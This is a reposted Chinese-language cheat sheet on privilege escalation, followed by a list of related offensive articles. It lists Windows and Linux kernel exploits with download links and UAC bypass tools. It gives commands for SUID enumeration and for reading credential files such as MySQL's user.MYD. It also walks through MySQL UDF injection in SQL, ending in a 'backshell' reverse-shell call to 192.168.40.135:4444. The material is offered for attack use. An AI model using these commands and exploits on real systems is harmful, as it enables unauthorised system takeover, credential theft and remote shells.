应用安全-提权/降权相关整理
工具提权
https://github.com/SecWiki/linux-kernel-exploits
提权CVE
https://github.com/nixawk/labs
操作系统提权-Windows
LPK提权 - 工具 lpk sethc v4.0.exe ms11-080 -XP/2003 ms14-002 - XP/2003 ms14-068 - 域提权 ms-15-010 - CVE-2015-0003 - Windows XP/2K3/VISTA/2K8/7 WM_SYSTIMER Kernel EoP ms15-051 CVE-2015-1701 - 2003/Vista/Server 2008/Windows 7/2008 R2/Windows 8 和 Windows 8.1/Windows Server 2012 和 Windows Server 2012 R2/Windows RT 和 Windows RT 8.1
ms15-077 - 2003/Vista/erver 2008/Windows 7/Server 2008 R2/Windows 8 和 Windows 8.1/Windows Server 2012 和 Windows Server 2012 R2/Windows RT 和 Windows RT 8.1 ms16-016 - Windows Vista SP2 Windows Server 2008 x86 & x64 Windows Server 2008 R2 x64 Windows 7 x86 & x64 Windows 8.1 x86 & x64
ms16-032 - CVE-2016-0099 - Vista/ 2008/7/2008 R2/8.1/2012/2012R2/RT 8.1/10
攻击者首先必须登录系统
CVE-2019-1132 前置条件:登录权限 BypassUAC工具 UACME、Bypass-UAC、Yamabiko
windows内核漏洞提权
服务提权 数据库服务
WINDOWS错误系统配置提权
系统服务的错误权限配置漏洞提权
不安全的注册表权限配置提权
不安全的文件/文件夹权限配置提权
计划任务提权
任意用户以NT AUTHORITY\SYSTEM权限安装msi提权
CVE提权 比对漏洞库/补丁库 https://github.com/GDSSecurity/Windows-Exploit-Suggester/
https://github.com/SecWiki/windows-kernel-exploits
msf模块
软件漏洞提权 - Serv-U
常用端口 - 43958
软件漏洞提权 - radmin
端口 - 4899 - 破解注册表提权
软件漏洞提权 - vnc
常用端口 - 5900
操作系统提权 - Ubuntu
CVE-2019-7304
1 影响范围/条件: 2 3 Ubuntu 18.10 4 5 Ubuntu 18.04 LTS 6 7 Ubuntu 16.04 LTS 8 9 Ubuntu 14.04 LTS 10 11 2.28 < snapd < 2.37
View Code
Linux Kernel Version 4.14-4.4
EXP:
1 http://cyseclabs.com/exploits/upstream44.c
View Code
Linux内核版本提权
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) overlayfs(cve:2015-1328) Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) overlayfs(cve:2015-8660) Linux Kernel 4.3.3 overlayfs(cve:2015-8660)
Linux内核溢出提权
https://github.com/SecWiki/linux-kernel-exploits
SUID提权
find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} \;
系统服务的错误权限配置漏洞提权
cat /var/apache2/config.inc cat /var/lib/mysql/mysql/user.MYD cat /root/anaconda-ks.cfg
操作系统提权-Linux
Linux Kernel < 5.1.17 本地提权漏洞 - SSV-98033
提权检测工具
unix-privesc-check --适用与Unix/Linux
数据库提权-Mysql - Windows
利用mof提权 UDF提权 端口反弹提权 LPK劫持提权: 启动项提权: 工具提权 sqlmap直连数据库提权 msfudf提权 UDF #对于Windows2008以下服务器比较适用,主要针对Windows2000、Windows2003前置条件:1.拥有webshell2.在安装目录下创建lib\plugin文件夹,然后将udf.dll文件导入到相应路径 3.账号拥有insert和delete权限 若mysql版本 < 5.2 , UDF导出到系统目录c:/windows/system32/ 若mysql版本 > 5.2 ,UDF导出到安装路径MySQL\Lib\Plugin\$ gcc -DMYSQL_DYNAMIC_PLUGIN -fPIC -Wall -I/usr/include/mysql -I. -shared lib_mysqludf_sys.c -o lib_mysqludf_sys.somysql> show variables like '%plugin%';mysql> create function sys_eval returns string soname 'mysqludf.so';mysql> select sys_eval('whoami');mysql> drop function sys_eval;select * from mysql.user where user=substring_index(user(),'@',1); 前置条件: 无Webshell #通过查询将udf.dll转成代码插入数据库,然后导出(代码为select hex(load_file('/udf.dll'))中的内容) use mysql; set @a=concat('',0x代码); create table Ghost(data LONGBLOB); insert into Ghost values("");update Ghost set data = @a; select data from Ghost into dumpfile 'c:/phpStudy/MySQL/lib/plugin/udf.dll'; #导出ufd.dll CREATE FUNCTION backshell RETURNS STRING SONAME 'udf.dll'; #创建函数 select backshell("192.168.40.135",4444); 反弹端口提权 #主要针对Webshell无效时使用
MOF方法提权
运行MOF文件指定为命令行参数将Mofcomp.exe文件
使用IMofCompiler接口和$CompileFile方法
拖放到 %SystemRoot%\System32\Wbem\MOF 文件夹的 MOF 文件
工具相关 # Python_FuckMySQL
数据库提权-mssql
sa提权- web.config
转载于:https://www.cnblogs.com/AtesetEnginner/p/11194756.html
应用安全-提权/降权相关整理相关推荐
- C/C++ 进程代码注入与提权/降权
如果将shellcode注入到具有特定权限的进程中,我们就可以获得与该进程相同的权限,此方法可以用于提权与降权操作,注入有多种方式,最简单的是直接将metasploit生成的有效载荷直接注入到目标进程 ...
- 渗透技巧——程序的降权启动
本文讲的是渗透技巧--程序的降权启动, 0x00 前言 在渗透测试中,常常会遇到需要改变程序启动权限(分为提权和降权)的情况. 提权包含从普通用户权限到管理员权限和从管理员权限到system权限,而渗 ...
- 网站降权根服务器有关系吗,实例讲述更换服务器后导致网站降权的解决方法
8元一个月的服务器已经用了小半年了,实在经不住现在的流量冲击.因服务器问题,用户打开我的网站经常出现502错误,无奈只有更换服务器,由于服务器更换时没有处理好,导致网站被降权了.接下来的SEO干货来了 ...
- 湖南网络推广浅谈网站首页降权怎么办?
对于湖南网络推广的站长来说,提高网站排名是大家进行网站维护的最终目的,能有善始善终就很不错了,但在网站优化的过程中,就难免会出现网站首页降权的时候,那么对于首页降权了又该如何恢复呢?下面湖南网络推广就 ...
- 网站降权不必慌 扭转乾坤有绝招
"一夜过后,网站排名全没了,天呐,这是怎么回事?" "昨天5个主关键词还排在第一页,今早突然没了?这是怎么了" "网站关键词没了,老板怒了,工作不保了 ...
- 通过token窃取实现降权或者提权
文章目录 前言 通过msf实现 1.生成木马并以管理员权限运行 2.实现提权到system 3.降级到普通用户 通过incognito工具实现 1. 实现提权到system 2. 降权到普通user ...
- 【Android 逆向】Android 权限 ( adb 降权相关的属性 | ro.secure 属性 | ro.debuggable 属性 | service.adb.root 属性 )
文章目录 一.adb 降权 1.ro.secure 属性 2.ro.debuggable 属性 3.service.adb.root 属性 4.ro.kernel.qemu 属性 一.adb 降权 远 ...
- 『昆明SEO』网站被降权的常见问题有些呢?
网站被降权,都有哪些问题?该如何解决呢?网站本来好好的在成长,突然有一天排名全掉了,我相信是每一位ser不想遇到的情况!辛辛苦苦的付出没有收到应有的报答和待遇,心里肯定很蓝瘦的.接下来SEO技巧网分享 ...
- 湖南网络推广教大家如何“挽回”网站被降权的排名和权重?
很多时候,湖南网络推广表示,可能因为一些操作错误或者细节问题没把控好,或是被K了,好好的网站就突然降权了,让站长们都很猝不及防.那么针对这种情况,该如何挽回网站的排名和权重呢?下面湖南网络推广就带大家 ...
最新文章
- 快速入门 TensorFlow2 模型部署
- 作为Java程序员,这些开源工具你应该要学习!
- java反应器构型,反应器结构及工作原理现用图解.doc
- mysql外键约束脚本_使用SQL脚本创建数据库,操作主键、外键与各种约束(MS SQL Server)...
- 武器系统仿真技术(二):末端制导系统蒙特卡洛仿真法
- 用C语言程序进行比赛日程排列
- 【Oracle】并行等待之PX Deq: Table Q Normal
- Windows10家庭版 Windows defender 安全中心显示 页面不可用
- 攻防演练中防守方的防护措施.
- 一键式免费借还的智能充电宝租赁
- phpcmsV9 全站搜索功能如何实现
- 小白怎么快速入门游戏建模软件C4D?
- 用计算机录入稿件,如何利用OCR文字识别软件快速录入信息到电脑上?
- 国家测绘局公布2007年十大测绘违法典型案件(转)
- 2022-04-13 工作记录--LayUI-动态渲染数据表格的表头参数
- 【AutoSAR】【ComM】通信管理
- 人工智能导论学习笔记(教材王万良《人工智能导论》(第四版)高等教育出版社 )
- Mate Translate for Mac(翻译软件) V6.0.0中文破解版
- android手机彻底变砖拯救
- 测试开发工程师成长日记004 - linux常用命令day01
热门文章
- “那不勒斯”服务器芯片,32核/64超线程:AMD 公开 Naples “那不勒斯” 部分规格和性能...
- 超强!MDETR:基于Transformer的端到端目标检测神器!开源!
- 【资源下载】866页《计算机视觉:原理,算法,应用,学习》最新第五版-附下载
- 复练-软考网规-虚拟化专题
- python写剧情文字游戏_文字游戏引擎试用心得之一:Ren'py 和 Fungus
- java中判断undefined_Java虚拟机系列一:一文搞懂 JVM 架构和运行时数据区
- configure: error: zlib library not found
- ajax 获取openid,纯前端获取当前用户的openid(微信小程序)
- python十点半游戏代码_十点半游戏完整代码及详细注释.py
- java基本语法心得_Java学习笔记(一)——基础语法(上)